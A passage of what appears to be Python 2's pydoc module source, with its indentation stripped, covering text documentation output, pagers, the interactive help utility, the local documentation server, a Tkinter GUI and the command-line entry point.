tag = "inherited from %s" % classname(thisclass,
object.__module__)
filter(lambda t: not t[0].startswith('_'), attrs)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spillproperties("Properties %s:\n" % tag, attrs,
lambda t: t[1] == 'property')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = 'lambda'
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docproperty(self, name, value, mod):
results = []
push = results.append
if name:
push(name)
need_blank_after_doc = 0
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
need_blank_after_doc = 1
for attr, tag in [('fget', '<get>'),
('fset', '<set>'),
('fdel', '<delete>')]:
func = getattr(value, attr)
if func is not None:
if need_blank_after_doc:
push('')
need_blank_after_doc = 0
base = self.document(func, tag, mod)
push(self.indent(base))
return '\n'.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docproperty(name, object, mod)
def docother(self, object, name=None, mod=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if os.environ.get('TERM') in ['dumb', 'emacs']:
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ['dumb', 'emacs']:
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more %s' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' ' + filename)
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ['q', 'Q']:
sys.stdout.write('\r \r')
break
elif c in ['\r', '\n']:
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ['b', 'B', '\x1b']:
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(__builtin__, path):
return getattr(__builtin__, path)
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
pager(title % desc + '\n\n' + text.document(object, name))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for file in os.listdir(dir):
path = os.path.join(dir, file)
if ispackage(path):
writedocs(path, pkgpath + file + '.', done)
elif os.path.isfile(path):
modname = inspect.getmodulename(path)
if modname:
if modname == '__init__':
modname = pkgpath[:-1] # remove trailing period
else:
modname = pkgpath + modname
if modname not in done:
done[modname] = 1
writedoc(modname)
class Helper:
keywords = {
'and': 'BOOLEAN',
'assert': ('ref/assert', ''),
'break': ('ref/break', 'while for'),
'class': ('ref/class', 'CLASSES SPECIALMETHODS'),
'continue': ('ref/continue', 'while for'),
'def': ('ref/function', ''),
'del': ('ref/del', 'BASICMETHODS'),
'elif': 'if',
'else': ('ref/if', 'while for'),
'except': 'try',
'exec': ('ref/exec', ''),
'finally': 'try',
'for': ('ref/for', 'break continue while'),
'from': 'import',
'global': ('ref/global', 'NAMESPACES'),
'if': ('ref/if', 'TRUTHVALUE'),
'import': ('ref/import', 'MODULES'),
'in': ('ref/comparisons', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('ref/lambdas', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('ref/pass', ''),
'print': ('ref/print', ''),
'raise': ('ref/raise', 'EXCEPTIONS'),
'return': ('ref/return', 'FUNCTIONS'),
'try': ('ref/try', 'EXCEPTIONS'),
'while': ('ref/while', 'break continue if TRUTHVALUE'),
'yield': ('ref/yield', ''),
}
topics = {
'TYPES': ('ref/types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('ref/strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING TYPES'),
'STRINGMETHODS': ('lib/string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('lib/typesseq-strings', 'OPERATORS'),
'UNICODE': ('ref/strings', 'encodings unicode SEQUENCES STRINGMETHODS FORMATTING TYPES'),
'NUMBERS': ('ref/numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('ref/integers', 'int range'),
'FLOAT': ('ref/floating', 'float math'),
'COMPLEX': ('ref/imaginary', 'complex cmath'),
'SEQUENCES': ('lib/typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('lib/typesfunctions', 'def TYPES'),
'METHODS': ('lib/typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('lib/bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('lib/bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('lib/bltin-null-object', ''),
'ELLIPSIS': ('lib/bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('lib/bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('lib/specialattrs', ''),
'CLASSES': ('ref/types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('lib/typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('ref/summary', 'lambda or and not in is BOOLEAN COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('ref/objects', 'TYPES'),
'SPECIALMETHODS': ('ref/specialnames', 'BASICMETHODS ATTRIBUTEMETHODS CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('ref/customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('ref/attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('ref/callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('ref/sequence-types', 'SEQUENCES SEQUENCEMETHODS2 SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('ref/sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 SPECIALMETHODS'),
'MAPPINGMETHODS': ('ref/sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('ref/numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT SPECIALMETHODS'),
'EXECUTION': ('ref/execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('ref/naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('ref/dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('ref/exceptions', 'try except finally raise'),
'COERCIONS': ('ref/coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('ref/conversions', 'COERCIONS'),
'IDENTIFIERS': ('ref/identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('ref/id-classes', ''),
'PRIVATENAMES': ('ref/atom-identifiers', ''),
'LITERALS': ('ref/atom-literals', 'STRINGS BACKQUOTES NUMBERS TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('ref/exprlists', 'TUPLES LITERALS'),
'LISTS': ('lib/typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('ref/lists', 'LISTS LITERALS'),
'DICTIONARIES': ('lib/typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('ref/dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('ref/string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('ref/attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('ref/subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('ref/slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('ref/calls', 'EXPRESSIONS'),
'POWER': ('ref/power', 'EXPRESSIONS'),
'UNARY': ('ref/unary', 'EXPRESSIONS'),
'BINARY': ('ref/binary', 'EXPRESSIONS'),
'SHIFTING': ('ref/shifting', 'EXPRESSIONS'),
'BITWISE': ('ref/bitwise', 'EXPRESSIONS'),
'COMPARISON': ('ref/comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('ref/Booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('ref/assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('ref/augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('ref/compound', 'for while break continue'),
'TRUTHVALUE': ('lib/truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('lib/module-pdb', 'pdb'),
}
def __init__(self, input, output):
self.input = input
self.output = output
self.docdir = None
execdir = os.path.dirname(sys.executable)
homedir = os.environ.get('PYTHONHOME')
for dir in [os.environ.get('PYTHONDOCS'),
homedir and os.path.join(homedir, 'doc'),
os.path.join(execdir, 'doc'),
'/usr/doc/python-docs-' + split(sys.version)[0],
'/usr/doc/python-' + split(sys.version)[0],
'/usr/doc/python-docs-' + sys.version[:3],
'/usr/doc/python-' + sys.version[:3],
os.path.join(sys.prefix, 'Resources/English.lproj/Documentation')]:
if dir and os.path.isdir(os.path.join(dir, 'lib')):
self.docdir = dir
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
def __call__(self, request=None):
if request is not None:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ['q', 'quit']: break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://www.python.org/doc/tut/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic):
if not self.docdir:
self.output.write('''
Sorry, topic and keyword documentation is not available because the Python
HTML documentation files could not be found. If you have installed them,
please set the environment variable PYTHONDOCS to indicate their location.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target)
filename, xrefs = target
filename = self.docdir + '/' + filename + '.html'
try:
file = open(filename)
except:
self.output.write('could not read docs from %s\n' % filename)
return
divpat = re.compile('<div[^>]*navigat.*?</div.*?>', re.I | re.S)
addrpat = re.compile('<address.*?>.*?</address.*?>', re.I | re.S)
document = re.sub(addrpat, '', re.sub(divpat, '', file.read()))
file.close()
import htmllib, formatter, StringIO
buffer = StringIO.StringIO()
parser = htmllib.HTMLParser(
formatter.AbstractFormatter(formatter.DumbWriter(buffer)))
parser.start_table = parser.do_p
parser.end_table = lambda parser=parser: parser.do_p({})
parser.start_tr = parser.do_br
parser.start_td = parser.start_th = lambda a, b=buffer: b.write('\t')
parser.feed(document)
buffer = replace(buffer.getvalue(), '\xa0', ' ', '\n', '\n ')
pager(' ' + strip(buffer) + '\n')
if xrefs:
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
ModuleScanner().run(callback)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper(sys.stdin, sys.stdout)
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner(Scanner):
"""An interruptible scanner that searches module synopses."""
def __init__(self):
roots = map(lambda dir: (dir, ''), pathdirs())
Scanner.__init__(self, roots, self.submodules, self.isnewpackage)
self.inodes = map(lambda (dir, pkg): os.stat(dir).st_ino, roots)
def submodules(self, (dir, package)):
children = []
for file in os.listdir(dir):
path = os.path.join(dir, file)
if ispackage(path):
children.append((path, package + (package and '.') + file))
else:
children.append((path, package))
children.sort() # so that spam.py comes before spam.pyc or spam.pyo
return children
def isnewpackage(self, (dir, package)):
inode = os.path.exists(dir) and os.stat(dir).st_ino
if not (os.path.islink(dir) and inode in self.inodes):
self.inodes.append(inode) # detect circular symbolic links
return ispackage(dir)
return False
def run(self, callback, key=None, completer=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
while not self.quit:
node = self.next()
if not node: break
path, package = node
modname = inspect.getmodulename(path)
if os.path.isfile(path) and modname:
modname = package + (package and '.') + modname
if not modname in seen:
seen[modname] = 1 # if we see spam.py, skip spam.pyc
if key is None:
callback(path, modname, '')
else:
desc = synopsis(path) or ''
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer: completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
try: import warnings
except ImportError: pass
else: warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in pathdirs():
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
elif sys.platform == 'mac':
try: import ic
except ImportError: pass
else: ic.launchurl(url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default.
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
